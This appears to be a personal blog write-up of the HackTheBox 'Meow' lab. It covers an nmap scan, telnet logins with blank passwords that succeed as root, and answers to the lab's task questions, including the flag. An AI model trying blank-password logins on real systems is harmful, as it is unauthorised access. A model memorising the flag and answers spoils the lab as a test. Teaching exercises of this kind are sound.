Post

HackTheBox Meow Writeup

HackTheBox Meow Writeup

Meow-HTB

TL;DR

This writeup is based on the Meow machine, which is an easy-rated Linux box on Hack the Box. I began by scanning the target and found an open Telnet port (23). After enumerating the service, I attempted logging in with common usernames and blank passwords. While admin and administrator failed, I successfully accessed the system using the root account with no password. With root access, I retrieved the flag and completed the challenge.

Scanning Network

I began by performing an Nmap scan, which revealed open ports 23 , corresponding to telnet. Here are the results from Nmap scan:

1
2
3
4
5
6
7
nmap -sC -sV -A -T4 -Pn -oN scan/normal.scan 10.129.223.201
Nmap scan report for 10.129.223.201
Host is up (0.22s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Telnet is a network protocol that enables remote communication with devices using a text-based interface over TCP, typically on port 23. It allows users to access and manage systems but transmits data in plaintext, making it insecure. Due to its lack of encryption, Telnet has largely been replaced by SSH for secure remote access. However, it is still useful for testing network services, checking open ports, and interacting with protocols like HTTP and SMTP.

While doing some Google searches on this protocol, I found out that it is an old service used for the remote management of other hosts on the network.

Since the target is running this service, it can receive Telnet connection requests from other hosts on the network.

Connection requests through Telnet are configured with a combination of a username and password for increased security.

1
2
3
4
5
6
7
8
9
10
11
telnet 10.129.223.201 23
Trying 10.129.223.201...
Connected to 10.129.223.201.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: 

I have to find some credentials to continue the work since I don’t have any other ports on the target.

Sometimes due to configuration issue, some important accounts can be left without a passwords. We can brute force some typical important account such as admin, administrator,root with blank password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
telnet 10.129.223.201 23
Trying 10.129.223.201...
Connected to 10.129.223.201.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: admin
Password: 

Login incorrect
Meow login: administrator
Password: 

Login incorrect

Exploitation

The first two try were unlucky. Let’s try root account for login.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
 telnet 10.129.223.201 23
Trying 10.129.223.201...
Connected to 10.129.223.201.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 15 Feb 2025 04:29:29 AM UTC

  System load:           0.22
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             134
  Users logged in:       0
  IPv4 address for eth0: 10.129.223.201
  IPv6 address for eth0: dead:beef::250:56ff:fe94:e0f1

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Feb 15 04:16:18 UTC 2025 on pts/0
root@Meow:~# 

I have successfully logged in as root user in target machine. So, let’s read the flag now.

1
2
3
4
5
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt 
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~# exit

Tasks

What does the acronym VM stand for?

1
Virtual Machine

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.

1
terminal

What service do we use to form our VPN connection into HTB labs?

1
openvpn

What tool do we use to test our connection to the target with an ICMP echo request?

1
ping

What is the name of the most common tool for finding open ports on a target?

1
nmap

What service do we identify on port 23/tcp during our scans?

1
telnet

What username is able to log into the target over telnet with a blank password?

1
root

Submit root flag

1
b40abdfe23665f766f9c61ecba8a4c19

Thanks for reading this far. If you enjoyed the writeup, do support me here.

This post is licensed under CC BY 4.0 by the author.